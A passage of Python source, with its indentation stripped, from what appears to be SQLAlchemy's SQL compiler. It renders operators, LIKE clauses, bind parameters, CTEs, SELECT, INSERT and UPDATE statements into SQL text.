return text
def visit_unary(self, unary, **kw):
if unary.operator:
if unary.modifier:
raise exc.CompileError(
"Unary expression does not support operator "
"and modifier simultaneously")
disp = getattr(self, "visit_%s_unary_operator" %
unary.operator.__name__, None)
if disp:
return disp(unary, unary.operator, **kw)
else:
return self._generate_generic_unary_operator(unary,
OPERATORS[unary.operator], **kw)
elif unary.modifier:
disp = getattr(self, "visit_%s_unary_modifier" %
unary.modifier.__name__, None)
if disp:
return disp(unary, unary.modifier, **kw)
else:
return self._generate_generic_unary_modifier(unary,
OPERATORS[unary.modifier], **kw)
else:
raise exc.CompileError(
"Unary expression has no operator or modifier")
def visit_istrue_unary_operator(self, element, operator, **kw):
if self.dialect.supports_native_boolean:
return self.process(element.element, **kw)
else:
return "%s = 1" % self.process(element.element, **kw)
def visit_isfalse_unary_operator(self, element, operator, **kw):
if self.dialect.supports_native_boolean:
return "NOT %s" % self.process(element.element, **kw)
else:
return "%s = 0" % self.process(element.element, **kw)
def visit_binary(self, binary, **kw):
# don't allow "? = ?" to render
if self.ansi_bind_rules and \
isinstance(binary.left, elements.BindParameter) and \
isinstance(binary.right, elements.BindParameter):
kw['literal_binds'] = True
operator = binary.operator
disp = getattr(self, "visit_%s_binary" % operator.__name__, None)
if disp:
return disp(binary, operator, **kw)
else:
try:
opstring = OPERATORS[operator]
except KeyError:
raise exc.UnsupportedCompilationError(self, operator)
else:
return self._generate_generic_binary(binary, opstring, **kw)
def visit_custom_op_binary(self, element, operator, **kw):
return self._generate_generic_binary(element,
" " + operator.opstring + " ", **kw)
def visit_custom_op_unary_operator(self, element, operator, **kw):
return self._generate_generic_unary_operator(element,
operator.opstring + " ", **kw)
def visit_custom_op_unary_modifier(self, element, operator, **kw):
return self._generate_generic_unary_modifier(element,
" " + operator.opstring, **kw)
def _generate_generic_binary(self, binary, opstring, **kw):
return binary.left._compiler_dispatch(self, **kw) + \
opstring + \
binary.right._compiler_dispatch(self, **kw)
def _generate_generic_unary_operator(self, unary, opstring, **kw):
return opstring + unary.element._compiler_dispatch(self, **kw)
def _generate_generic_unary_modifier(self, unary, opstring, **kw):
return unary.element._compiler_dispatch(self, **kw) + opstring
@util.memoized_property
def _like_percent_literal(self):
return elements.literal_column("'%'", type_=sqltypes.STRINGTYPE)
def visit_contains_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right).__add__(percent)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notcontains_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right).__add__(percent)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_startswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__radd__(
binary.right
)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notstartswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__radd__(
binary.right
)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_endswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notendswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_like_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
# TODO: use ternary here, not "and"/ "or"
return '%s LIKE %s' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
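# Usage note (approximate output): contains()/startswith()/endswith() above are
# rewritten into LIKE by concatenating '%' literals, so t.c.name.contains('foo')
# renders roughly as "users.name LIKE '%' || :name_1 || '%'" on dialects that
# use || for string concatenation; an explicit escape= adds the ESCAPE clause.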
def visit_notlike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return '%s NOT LIKE %s' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_ilike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return 'lower(%s) LIKE lower(%s)' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_notilike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return 'lower(%s) NOT LIKE lower(%s)' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_bindparam(self, bindparam, within_columns_clause=False,
literal_binds=False,
skip_bind_expression=False,
**kwargs):
if not skip_bind_expression and bindparam.type._has_bind_expression:
bind_expression = bindparam.type.bind_expression(bindparam)
return self.process(bind_expression,
skip_bind_expression=True)
if literal_binds or \
(within_columns_clause and \
self.ansi_bind_rules):
if bindparam.value is None and bindparam.callable is None:
raise exc.CompileError("Bind parameter '%s' without a "
"renderable value not allowed here."
% bindparam.key)
return self.render_literal_bindparam(bindparam,
within_columns_clause=True, **kwargs)
name = self._truncate_bindparam(bindparam)
if name in self.binds:
existing = self.binds[name]
if existing is not bindparam:
if (existing.unique or bindparam.unique) and \
not existing.proxy_set.intersection(
bindparam.proxy_set):
raise exc.CompileError(
"Bind parameter '%s' conflicts with "
"unique bind parameter of the same name" %
bindparam.key
)
elif existing._is_crud or bindparam._is_crud:
raise exc.CompileError(
"bindparam() name '%s' is reserved "
"for automatic usage in the VALUES or SET "
"clause of this "
"insert/update statement. Please use a "
"name other than column name when using bindparam() "
"with insert() or update() (for example, 'b_%s')."
% (bindparam.key, bindparam.key)
)
self.binds[bindparam.key] = self.binds[name] = bindparam
return self.bindparam_string(name, **kwargs)
def render_literal_bindparam(self, bindparam, **kw):
value = bindparam.effective_value
return self.render_literal_value(value, bindparam.type)
def render_literal_value(self, value, type_):
"""Render the value of a bind parameter as a quoted literal.
This is used for statement sections that do not accept bind parameters
on the target driver/database.
This should be implemented by subclasses using the quoting services
of the DBAPI.
"""
processor = type_._cached_literal_processor(self.dialect)
if processor:
return processor(value)
else:
raise NotImplementedError(
"Don't know how to literal-quote value %r" % value)
def _truncate_bindparam(self, bindparam):
if bindparam in self.bind_names:
return self.bind_names[bindparam]
bind_name = bindparam.key
if isinstance(bind_name, elements._truncated_label):
bind_name = self._truncated_identifier("bindparam", bind_name)
# add to bind_names for translation
self.bind_names[bindparam] = bind_name
return bind_name
def _truncated_identifier(self, ident_class, name):
if (ident_class, name) in self.truncated_names:
return self.truncated_names[(ident_class, name)]
anonname = name.apply_map(self.anon_map)
if len(anonname) > self.label_length:
counter = self.truncated_names.get(ident_class, 1)
truncname = anonname[0:max(self.label_length - 6, 0)] + \
"_" + hex(counter)[2:]
self.truncated_names[ident_class] = counter + 1
else:
truncname = anonname
self.truncated_names[(ident_class, name)] = truncname
return truncname
def _anonymize(self, name):
return name % self.anon_map
def _process_anon(self, key):
(ident, derived) = key.split(' ', 1)
anonymous_counter = self.anon_map.get(derived, 1)
self.anon_map[derived] = anonymous_counter + 1
return derived + "_" + str(anonymous_counter)
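# Note (approximate behavior): "anonymous" identifiers are deferred label
# templates; _process_anon() assigns them stable numbered names such as
# "anon_1", while _truncated_identifier() shortens names longer than
# label_length to a prefix plus "_" and a hex counter suffix.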
def bindparam_string(self, name, positional_names=None, **kw):
if self.positional:
if positional_names is not None:
positional_names.append(name)
else:
self.positiontup.append(name)
return self.bindtemplate % {'name': name}
def visit_cte(self, cte, asfrom=False, ashint=False,
fromhints=None,
**kwargs):
self._init_cte_state()
if self.positional:
kwargs['positional_names'] = self.cte_positional
if isinstance(cte.name, elements._truncated_label):
cte_name = self._truncated_identifier("alias", cte.name)
else:
cte_name = cte.name
if cte_name in self.ctes_by_name:
existing_cte = self.ctes_by_name[cte_name]
# we've generated a same-named CTE that we are enclosed in,
# or this is the same CTE. just return the name.
if cte in existing_cte._restates or cte is existing_cte:
return self.preparer.format_alias(cte, cte_name)
elif existing_cte in cte._restates:
# we've generated a same-named CTE that is
# enclosed in us - we take precedence, so
# discard the text for the "inner".
del self.ctes[existing_cte]
else:
raise exc.CompileError(
"Multiple, unrelated CTEs found with "
"the same name: %r" %
cte_name)
self.ctes_by_name[cte_name] = cte
if cte._cte_alias is not None:
orig_cte = cte._cte_alias
if orig_cte not in self.ctes:
self.visit_cte(orig_cte)
cte_alias_name = cte._cte_alias.name
if isinstance(cte_alias_name, elements._truncated_label):
cte_alias_name = self._truncated_identifier("alias", cte_alias_name)
else:
orig_cte = cte
cte_alias_name = None
if not cte_alias_name and cte not in self.ctes:
if cte.recursive:
self.ctes_recursive = True
text = self.preparer.format_alias(cte, cte_name)
if cte.recursive:
if isinstance(cte.original, selectable.Select):
col_source = cte.original
elif isinstance(cte.original, selectable.CompoundSelect):
col_source = cte.original.selects[0]
else:
assert False
recur_cols = [c for c in
util.unique_list(col_source.inner_columns)
if c is not None]
text += "(%s)" % (", ".join(
self.preparer.format_column(ident)
for ident in recur_cols))
text += " AS \n" + \
cte.original._compiler_dispatch(
self, asfrom=True, **kwargs
)
self.ctes[cte] = text
if asfrom:
if cte_alias_name:
text = self.preparer.format_alias(cte, cte_alias_name)
text += " AS " + cte_name
else:
return self.preparer.format_alias(cte, cte_name)
return text
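# Usage sketch (hypothetical names): given cte = select([t]).cte(name="regional"),
# select([cte]) compiles roughly to
# "WITH regional AS (SELECT ... FROM users) SELECT ... FROM regional",
# with the WITH preamble assembled later by _render_cte_clause().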
def visit_alias(self, alias, asfrom=False, ashint=False,
iscrud=False,
fromhints=None, **kwargs):
if asfrom or ashint:
if isinstance(alias.name, elements._truncated_label):
alias_name = self._truncated_identifier("alias", alias.name)
else:
alias_name = alias.name
if ashint:
return self.preparer.format_alias(alias, alias_name)
elif asfrom:
ret = alias.original._compiler_dispatch(self,
asfrom=True, **kwargs) + \
" AS " + \
self.preparer.format_alias(alias, alias_name)
if fromhints and alias in fromhints:
ret = self.format_from_hint_text(ret, alias,
fromhints[alias], iscrud)
return ret
else:
return alias.original._compiler_dispatch(self, **kwargs)
def _add_to_result_map(self, keyname, name, objects, type_):
if not self.dialect.case_sensitive:
keyname = keyname.lower()
if keyname in self.result_map:
# conflicting keyname, just double up the list
# of objects. this will cause an "ambiguous name"
# error if an attempt is made by the result set to
# access this column by key.
e_name, e_obj, e_type = self.result_map[keyname]
self.result_map[keyname] = e_name, e_obj + objects, e_type
else:
self.result_map[keyname] = name, objects, type_
def _label_select_column(self, select, column,
populate_result_map,
asfrom, column_clause_args,
name=None,
within_columns_clause=True):
"""produce labeled columns present in a select()."""
if column.type._has_column_expression and \
populate_result_map:
col_expr = column.type.column_expression(column)
add_to_result_map = lambda keyname, name, objects, type_: \
self._add_to_result_map(
keyname, name,
objects + (column,), type_)
else:
col_expr = column
if populate_result_map:
add_to_result_map = self._add_to_result_map
else:
add_to_result_map = None
if not within_columns_clause:
result_expr = col_expr
elif isinstance(column, elements.Label):
if col_expr is not column:
result_expr = _CompileLabel(
col_expr,
column.name,
alt_names=(column.element,)
)
else:
result_expr = col_expr
elif select is not None and name:
result_expr = _CompileLabel(
col_expr,
name,
alt_names=(column._key_label,)
)
elif \
asfrom and \
isinstance(column, elements.ColumnClause) and \
not column.is_literal and \
column.table is not None and \
not isinstance(column.table, selectable.Select):
result_expr = _CompileLabel(col_expr,
elements._as_truncated(column.name),
alt_names=(column.key,))
elif not isinstance(column,
(elements.UnaryExpression, elements.TextClause)) \
and (not hasattr(column, 'name') or \
isinstance(column, functions.Function)):
result_expr = _CompileLabel(col_expr, column.anon_label)
elif col_expr is not column:
# TODO: are we sure "column" has a .name and .key here ?
# assert isinstance(column, elements.ColumnClause)
result_expr = _CompileLabel(col_expr,
elements._as_truncated(column.name),
alt_names=(column.key,))
else:
result_expr = col_expr
column_clause_args.update(
within_columns_clause=within_columns_clause,
add_to_result_map=add_to_result_map
)
return result_expr._compiler_dispatch(
self,
**column_clause_args
)
def format_from_hint_text(self, sqltext, table, hint, iscrud):
hinttext = self.get_from_hint_text(table, hint)
if hinttext:
sqltext += " " + hinttext
return sqltext
def get_select_hint_text(self, byfroms):
return None
def get_from_hint_text(self, table, text):
return None
def get_crud_hint_text(self, table, text):
return None
def _transform_select_for_nested_joins(self, select):
"""Rewrite any "a JOIN (b JOIN c)" expression as
"a JOIN (select * from b JOIN c) AS anon", to support
databases that can't parse a parenthesized join correctly
(e.g. SQLite being the main one).
"""
cloned = {}
column_translate = [{}]
def visit(element, **kw):
if element in column_translate[-1]:
return column_translate[-1][element]
elif element in cloned:
return cloned[element]
newelem = cloned[element] = element._clone()
if newelem.is_selectable and newelem._is_join and \
isinstance(newelem.right, selectable.FromGrouping):
newelem._reset_exported()
newelem.left = visit(newelem.left, **kw)
right = visit(newelem.right, **kw)
selectable_ = selectable.Select(
[right.element],
use_labels=True).alias()
for c in selectable_.c:
c._key_label = c.key
c._label = c.name
translate_dict = dict(
zip(newelem.right.element.c, selectable_.c)
)
# translating from both the old and the new
# because different select() structures will lead us
# to traverse differently
translate_dict[right.element.left] = selectable_
translate_dict[right.element.right] = selectable_
translate_dict[newelem.right.element.left] = selectable_
translate_dict[newelem.right.element.right] = selectable_
# propagate translations that we've gained
# from nested visit(newelem.right) outwards
# to the enclosing select here. this happens
# only when we have more than one level of right
# join nesting, i.e. "a JOIN (b JOIN (c JOIN d))"
for k, v in list(column_translate[-1].items()):
if v in translate_dict:
# remarkably, no current ORM tests (May 2013)
# hit this condition, only test_join_rewriting
# does.
column_translate[-1][k] = translate_dict[v]
column_translate[-1].update(translate_dict)
newelem.right = selectable_
newelem.onclause = visit(newelem.onclause, **kw)
elif newelem.is_selectable and newelem._is_from_container:
# if we hit an Alias or CompoundSelect, put a marker in the
# stack.
kw['transform_clue'] = 'select_container'
newelem._copy_internals(clone=visit, **kw)
elif newelem.is_selectable and newelem._is_select:
barrier_select = kw.get('transform_clue', None) == 'select_container'
# if we're still descended from an Alias/CompoundSelect, we're
# in a FROM clause, so start with a new translate collection
if barrier_select:
column_translate.append({})
kw['transform_clue'] = 'inside_select'
newelem._copy_internals(clone=visit, **kw)
if barrier_select:
del column_translate[-1]
else:
newelem._copy_internals(clone=visit, **kw)
return newelem
return visit(select)
def _transform_result_map_for_nested_joins(self, select, transformed_select):
inner_col = dict((c._key_label, c) for
c in transformed_select.inner_columns)
d = dict(
(inner_col[c._key_label], c)
for c in select.inner_columns
)
for key, (name, objs, typ) in list(self.result_map.items()):
objs = tuple([d.get(col, col) for col in objs])
self.result_map[key] = (name, objs, typ)
_default_stack_entry = util.immutabledict([
('iswrapper', False),
('correlate_froms', frozenset()),
('asfrom_froms', frozenset())
])
def _display_froms_for_select(self, select, asfrom):
# utility method to help external dialects
# get the correct from list for a select.
# specifically the oracle dialect needs this feature
# right now.
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
correlate_froms = entry['correlate_froms']
asfrom_froms = entry['asfrom_froms']
if asfrom:
froms = select._get_display_froms(
explicit_correlate_froms=\
correlate_froms.difference(asfrom_froms),
implicit_correlate_froms=())
else:
froms = select._get_display_froms(
explicit_correlate_froms=correlate_froms,
implicit_correlate_froms=asfrom_froms)
return froms
def visit_select(self, select, asfrom=False, parens=True,
iswrapper=False, fromhints=None,
compound_index=0,
force_result_map=False,
positional_names=None,
nested_join_translation=False,
**kwargs):
needs_nested_translation = \
select.use_labels and \
not nested_join_translation and \
not self.stack and \
not self.dialect.supports_right_nested_joins
if needs_nested_translation:
transformed_select = self._transform_select_for_nested_joins(select)
text = self.visit_select(
transformed_select, asfrom=asfrom, parens=parens,
iswrapper=iswrapper, fromhints=fromhints,
compound_index=compound_index,
force_result_map=force_result_map,
positional_names=positional_names,
nested_join_translation=True, **kwargs
)
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
populate_result_map = force_result_map or (
compound_index == 0 and (
toplevel or \
entry['iswrapper']
)
)
if needs_nested_translation:
if populate_result_map:
self._transform_result_map_for_nested_joins(
select, transformed_select)
return text
correlate_froms = entry['correlate_froms']
asfrom_froms = entry['asfrom_froms']
if asfrom:
froms = select._get_display_froms(
explicit_correlate_froms=
correlate_froms.difference(asfrom_froms),
implicit_correlate_froms=())
else:
froms = select._get_display_froms(
explicit_correlate_froms=correlate_froms,
implicit_correlate_froms=asfrom_froms)
new_correlate_froms = set(selectable._from_objects(*froms))
all_correlate_froms = new_correlate_froms.union(correlate_froms)
new_entry = {
'asfrom_froms': new_correlate_froms,
'iswrapper': iswrapper,
'correlate_froms': all_correlate_froms
}
self.stack.append(new_entry)
column_clause_args = kwargs.copy()
column_clause_args.update({
'positional_names': positional_names,
'within_label_clause': False,
'within_columns_clause': False
})
# the actual list of columns to print in the SELECT column list.
inner_columns = [
c for c in [
self._label_select_column(select,
column,
populate_result_map, asfrom,
column_clause_args,
name=name)
for name, column in select._columns_plus_names
]
if c is not None
]
text = "SELECT " # we're off to a good start !
if select._hints:
byfrom = dict([
(from_, hinttext % {
'name':from_._compiler_dispatch(
self, ashint=True)
})
for (from_, dialect), hinttext in
select._hints.items()
if dialect in ('*', self.dialect.name)
])
hint_text = self.get_select_hint_text(byfrom)
if hint_text:
text += hint_text + " "
if select._prefixes:
text += self._generate_prefixes(select, select._prefixes, **kwargs)
text += self.get_select_precolumns(select)
text += ', '.join(inner_columns)
if froms:
text += " \nFROM "
if select._hints:
text += ', '.join([f._compiler_dispatch(self,
asfrom=True, fromhints=byfrom,
**kwargs)
for f in froms])
else:
text += ', '.join([f._compiler_dispatch(self,
asfrom=True, **kwargs)
for f in froms])
else:
text += self.default_from()
if select._whereclause is not None:
t = select._whereclause._compiler_dispatch(self, **kwargs)
if t:
text += " \nWHERE " + t
if select._group_by_clause.clauses:
group_by = select._group_by_clause._compiler_dispatch(
self, **kwargs)
if group_by:
text += " GROUP BY " + group_by
if select._having is not None:
t = select._having._compiler_dispatch(self, **kwargs)
if t:
text += " \nHAVING " + t
if select._order_by_clause.clauses:
if self.dialect.supports_simple_order_by_label:
order_by_select = select
else:
order_by_select = None
text += self.order_by_clause(select,
order_by_select=order_by_select, **kwargs)
if select._limit is not None or select._offset is not None:
text += self.limit_clause(select)
if select._for_update_arg is not None:
text += self.for_update_clause(select)
if self.ctes and \
compound_index == 0 and toplevel:
text = self._render_cte_clause() + text
self.stack.pop(-1)
if asfrom and parens:
return "(" + text + ")"
else:
return text
def _generate_prefixes(self, stmt, prefixes, **kw):
clause = " ".join(
prefix._compiler_dispatch(self, **kw)
for prefix, dialect_name in prefixes
if dialect_name is None or
dialect_name == self.dialect.name
)
if clause:
clause += " "
return clause
def _render_cte_clause(self):
if self.positional:
self.positiontup = self.cte_positional + self.positiontup
cte_text = self.get_cte_preamble(self.ctes_recursive) + " "
cte_text += ", \n".join(
[txt for txt in self.ctes.values()]
)
cte_text += "\n "
return cte_text
def get_cte_preamble(self, recursive):
if recursive:
return "WITH RECURSIVE"
else:
return "WITH"
def get_select_precolumns(self, select):
"""Called when building a ``SELECT`` statement, position is just
before column list.
"""
return select._distinct and "DISTINCT " or ""
def order_by_clause(self, select, **kw):
order_by = select._order_by_clause._compiler_dispatch(self, **kw)
if order_by:
return " ORDER BY " + order_by
else:
return ""
def for_update_clause(self, select):
return " FOR UPDATE"
def returning_clause(self, stmt, returning_cols):
raise exc.CompileError(
"RETURNING is not supported by this "
"dialect's statement compiler.")
def limit_clause(self, select):
text = ""
if select._limit is not None:
text += "\n LIMIT " + self.process(elements.literal(select._limit))
if select._offset is not None:
if select._limit is None:
text += "\n LIMIT -1"
text += " OFFSET " + self.process(elements.literal(select._offset))
return text
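# Usage note (approximate output): an OFFSET with no LIMIT emits the
# "LIMIT -1" idiom above so OFFSET stays syntactically valid on dialects such
# as SQLite; select([t]).offset(10) renders roughly as
# "SELECT ... FROM users LIMIT -1 OFFSET :param_1".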
def visit_table(self, table, asfrom=False, iscrud=False, ashint=False,
fromhints=None, **kwargs):
if asfrom or ashint:
if getattr(table, "schema", None):
ret = self.preparer.quote_schema(table.schema) + \
"." + self.preparer.quote(table.name)
else:
ret = self.preparer.quote(table.name)
if fromhints and table in fromhints:
ret = self.format_from_hint_text(ret, table,
fromhints[table], iscrud)
return ret
else:
return ""
def visit_join(self, join, asfrom=False, **kwargs):
return (
join.left._compiler_dispatch(self, asfrom=True, **kwargs) +
(join.isouter and " LEFT OUTER JOIN " or " JOIN ") +
join.right._compiler_dispatch(self, asfrom=True, **kwargs) +
" ON " +
join.onclause._compiler_dispatch(self, **kwargs)
)
def visit_insert(self, insert_stmt, **kw):
self.isinsert = True
colparams = self._get_colparams(insert_stmt, **kw)
if not colparams and \
not self.dialect.supports_default_values and \
not self.dialect.supports_empty_insert:
raise exc.CompileError("The '%s' dialect with current database "
"version settings does not support empty "
"inserts." %
self.dialect.name)
if insert_stmt._has_multi_parameters:
if not self.dialect.supports_multivalues_insert:
raise exc.CompileError("The '%s' dialect with current database "
"version settings does not support "
"in-place multirow inserts." %
self.dialect.name)
colparams_single = colparams[0]
else:
colparams_single = colparams
preparer = self.preparer
supports_default_values = self.dialect.supports_default_values
text = "INSERT "
if insert_stmt._prefixes:
text += self._generate_prefixes(insert_stmt,
insert_stmt._prefixes, **kw)
text += "INTO "
table_text = preparer.format_table(insert_stmt.table)
if insert_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
insert_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if insert_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
insert_stmt.table,
dialect_hints[insert_stmt.table],
True
)
text += table_text
if colparams_single or not supports_default_values:
text += " (%s)" % ', '.join([preparer.format_column(c[0])
for c in colparams_single])
if self.returning or insert_stmt._returning:
self.returning = self.returning or insert_stmt._returning
returning_clause = self.returning_clause(
insert_stmt, self.returning)
if self.returning_precedes_values:
text += " " + returning_clause
if insert_stmt.select is not None:
text += " %s" % self.process(insert_stmt.select, **kw)
elif not colparams and supports_default_values:
text += " DEFAULT VALUES"
elif insert_stmt._has_multi_parameters:
text += " VALUES %s" % (
", ".join(
"(%s)" % (
', '.join(c[1] for c in colparam_set)
)
for colparam_set in colparams
)
)
else:
text += " VALUES (%s)" % \
', '.join([c[1] for c in colparams])
if self.returning and not self.returning_precedes_values:
text += " " + returning_clause
return text
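# Usage sketch (hypothetical table): t.insert().values(name='x') compiles
# roughly to "INSERT INTO users (name) VALUES (:name)"; a multi-row
# insert().values([{...}, {...}]) takes the multi-VALUES branch above on
# dialects reporting supports_multivalues_insert.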
def update_limit_clause(self, update_stmt):
"""Provide a hook for MySQL to add LIMIT to the UPDATE"""
return None
def update_tables_clause(self, update_stmt, from_table,
extra_froms, **kw):
"""Provide a hook to override the initial table clause
in an UPDATE statement.
MySQL overrides this.
"""
return from_table._compiler_dispatch(self, asfrom=True,
iscrud=True, **kw)
def update_from_clause(self, update_stmt,
from_table, extra_froms,
from_hints,
**kw):
"""Provide a hook to override the generation of an
UPDATE..FROM clause.
MySQL and MSSQL override this.
"""
return "FROM " + ', '.join(
t._compiler_dispatch(self, asfrom=True,
fromhints=from_hints, **kw)
for t in extra_froms)
def visit_update(self, update_stmt, **kw):
self.stack.append(
{'correlate_froms': set([update_stmt.table]),
"iswrapper": False,
"asfrom_froms": set([update_stmt.table])})
self.isupdate = True
extra_froms = update_stmt._extra_froms
text = "UPDATE "
if update_stmt._prefixes:
text += self._generate_prefixes(update_stmt,
update_stmt._prefixes, **kw)
table_text = self.update_tables_clause(update_stmt, update_stmt.table,
extra_froms, **kw)
colparams = self._get_colparams(update_stmt, **kw)
if update_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
update_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if update_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
update_stmt.table,
dialect_hints[update_stmt.table],
True
)
else:
dialect_hints = None
text += table_text
text += ' SET '
include_table = extra_froms and \
self.render_table_with_column_in_update_from
text += ', '.join(
c[0]._compiler_dispatch(self,
include_table=include_table) +
'=' + c[1] for c in colparams
)
if self.returning or update_stmt._returning:
if not self.returning:
self.returning = update_stmt._returning
if self.returning_precedes_values:
text += " " + self.returning_clause(
update_stmt, self.returning)
if extra_froms:
extra_from_text = self.update_from_clause(
update_stmt,
update_stmt.table,
extra_froms,
dialect_hints, **kw)
if extra_from_text:
text += " " + extra_from_text
if update_stmt._whereclause is not None:
text += " WHERE " + self.process(update_stmt._whereclause)
limit_clause = self.update_limit_clause(update_stmt)
if limit_clause:
text += " " + limit_clause
if self.returning and not self.returning_precedes_values:
text += " " + self.returning_clause(
update_stmt, self.returning)
self.stack.pop(-1)
return text
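# Usage sketch (hypothetical table): t.update().where(t.c.id == 5).values(name='x')
# compiles roughly to "UPDATE users SET name=:name WHERE users.id = :id_1".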
def _create_crud_bind_param(self, col, value, required=False, name=None):
if name is None:
name = col.key
bindparam = elements.BindParameter(name, value,
type_=col.type, required=required)
bindparam._is_crud = True
return bindparam._compiler_dispatch(self)
@util.memoized_property
def _key_getters_for_crud_column(self):
if self.isupdate and self.statement._extra_froms:
# when extra tables are present, refer to the columns
# in those extra tables as table-qualified, including in
# dictionaries and when rendering bind param names.
# the "main" table of the statement remains unqualified,
# allowing the most compatibility with a non-multi-table
# statement.
_et = set(self.statement._extra_froms)
def _column_as_key(key):
str_key = elements._column_as_key(key)
if hasattr(key, 'table') and key.table in _et:
return (key.table.name, str_key)
else:
return str_key
def _getattr_col_key(col):
if col.table in _et:
return (col.table.name, col.key)
else:
return col.key
def _col_bind_name(col):
if col.table in _et:
return "%s_%s" % (col.table.name, col.key)
else:
return col.key
else:
_column_as_key = elements._column_as_key
_getattr_col_key = _col_bind_name = operator.attrgetter("key")
return _column_as_key, _getattr_col_key, _col_bind_name
def _get_colparams(self, stmt, **kw):
"""create a set of tuples representing column/string pairs for use
in an INSERT or UPDATE statement.
Also generates the Compiled object's postfetch, prefetch, and
returning column collections, used for default handling and ultimately
populating the ResultProxy's prefetch_cols() and postfetch_cols()
collections.
"""
self.postfetch = []
self.prefetch = []
self.returning = []
# no parameters in the statement, no parameters in the
# compiled params - return binds for all columns
if self.column_keys is None and stmt.parameters is None:
return [
(c, self._create_crud_bind_param(c,
None, required=True))
for c in stmt.table.columns
]
if stmt._has_multi_parameters:
stmt_parameters = stmt.parameters[0]
else:
stmt_parameters = stmt.parameters
# getters - these are normally just column.key,
# but in the case of mysql multi-table update, the rules for
# .key must conditionally take tablename into account
_column_as_key, _getattr_col_key, _col_bind_name = \
self._key_getters_for_crud_column
# if we have statement parameters - set defaults in the
# compiled params
if self.column_keys is None:
parameters = {}
else:
parameters = dict((_column_as_key(key), REQUIRED)
for key in self.column_keys
if not stmt_parameters or
key not in stmt_parameters)
# create a list of column assignment clauses as tuples
values = []
if stmt_parameters is not None:
for k, v in stmt_parameters.items():
colkey = _column_as_key(k)
if colkey is not None:
parameters.setdefault(colkey, v)
else:
# a non-Column expression on the left side;
# add it to values() in an "as-is" state,
# coercing right side to bound param
if elements._is_literal(v):
v = self.process(
elements.BindParameter(None, v, type_=k.type),
**kw)
else:
v = self.process(v.self_group(), **kw)
values.append((k, v))
need_pks = self.isinsert and \
not self.inline and \
not stmt._returning
implicit_returning = need_pks and \
self.dialect.implicit_returning and \
stmt.table.implicit_returning
if self.isinsert:
implicit_return_defaults = implicit_returning and stmt._return_defaults
elif self.isupdate:
implicit_return_defaults = self.dialect.implicit_returning and \
stmt.table.implicit_returning and \
stmt._return_defaults
if implicit_return_defaults:
if stmt._return_defaults is True:
implicit_return_defaults = set(stmt.table.c)
else:
implicit_return_defaults = set(stmt._return_defaults)
postfetch_lastrowid = need_pks and self.dialect.postfetch_lastrowid
check_columns = {}
# special logic that only occurs for multi-table UPDATE
# statements
if self.isupdate and stmt._extra_froms and stmt_parameters:
normalized_params = dict(
(elements._clause_element_as_expr(c), param)
for c, param in stmt_parameters.items()
)
affected_tables = set()
for t in stmt._extra_froms:
for c in t.c:
if c in normalized_params:
affected_tables.add(t)
check_columns[_getattr_col_key(c)] = c
value = normalized_params[c]
if elements._is_literal(value):
value = self._create_crud_bind_param(
c, value, required=value is REQUIRED,
name=_col_bind_name(c))
else:
self.postfetch.append(c)
value = self.process(value.self_group(), **kw)
values.append((c, value))
# determine tables which are actually
# to be updated - process onupdate and
# server_onupdate for these
for t in affected_tables:
for c in t.c:
if c in normalized_params:
continue
elif c.onupdate is not None and not c.onupdate.is_sequence:
if c.onupdate.is_clause_element:
values.append(
(c, self.process(
c.onupdate.arg.self_group(),
**kw)
)
)
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(
c, None, name=_col_bind_name(c)
)
)
)
self.prefetch.append(c)
elif c.server_onupdate is not None:
self.postfetch.append(c)
if self.isinsert and stmt.select_names:
# for an insert from select, we can only use names that
# are given, so only select for those names.
cols = (stmt.table.c[_column_as_key(name)]
for name in stmt.select_names)
else:
# iterate through all table columns to maintain
# ordering, even for those cols that aren't included
cols = stmt.table.columns
for c in cols:
col_key = _getattr_col_key(c)
if col_key in parameters and col_key not in check_columns:
value = parameters.pop(col_key)
if elements._is_literal(value):
value = self._create_crud_bind_param(
c, value, required=value is REQUIRED,
name=_col_bind_name(c)
if not stmt._has_multi_parameters
